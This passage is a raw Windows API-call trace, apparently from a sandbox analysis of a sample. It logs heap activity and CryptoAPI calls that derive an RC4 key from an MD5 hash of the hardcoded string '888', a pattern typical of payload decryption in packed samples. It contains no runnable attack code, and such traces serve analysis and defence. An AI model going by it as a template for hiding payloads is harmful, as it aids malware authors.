(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0246.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0246.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0246.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0246.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0246.742] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0246.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0246.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0246.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0246.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0246.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0246.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0246.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0246.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0246.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0246.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0246.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0246.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0246.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0246.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0246.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0246.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0246.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0246.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0246.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0246.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0246.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0246.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0246.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0246.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0246.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0246.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0246.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0246.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0246.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0246.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0246.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0246.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0246.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0246.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0246.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0246.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0246.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0246.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0246.743] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0246.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0246.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0246.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0246.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0246.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0246.744] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0246.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0246.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0246.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0246.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0246.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0246.745] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.745] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0246.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b90 | out: hHeap=0x970000) returned 1 [0246.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.745] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0246.745] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0246.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0246.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e510e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0246.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0246.745] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0246.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0246.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.746] CryptHashData (hHash=0xa87250, pbData=0x2e54e78, dwDataLen=0x3, dwFlags=0x1) returned 1 [0246.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0246.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0246.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0246.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0246.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0246.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0246.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0246.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0246.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0246.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0246.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0246.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0246.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0246.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0246.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0246.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0246.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0246.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0246.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0246.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0246.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0246.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0246.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0246.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0246.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0246.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0246.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0246.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0246.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0246.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0246.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0246.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0246.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0246.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0246.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0246.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0246.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0246.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0246.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0246.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0246.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0246.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0246.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0246.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0246.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0246.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0246.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0246.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0246.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0246.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0246.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0246.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0246.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0246.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0246.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0246.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0246.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0246.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0246.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0246.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0246.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0246.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0246.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0246.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0246.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.757] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0246.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0246.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0246.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0246.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56028 [0246.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0246.757] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0246.757] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0246.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0246.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0246.757] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0246.757] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0246.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0246.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0246.757] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0246.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0246.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0246.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0246.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0246.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0246.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51538 [0246.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51538, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0246.758] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87250, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87290) returned 1 [0246.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0246.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0246.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0246.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0246.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0246.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0246.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0246.758] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0246.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0246.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0246.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0246.758] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0246.758] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.758] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0246.759] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0246.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0246.759] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0246.759] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0246.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0246.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0246.759] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0246.759] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0246.759] RtlAllocateHeap 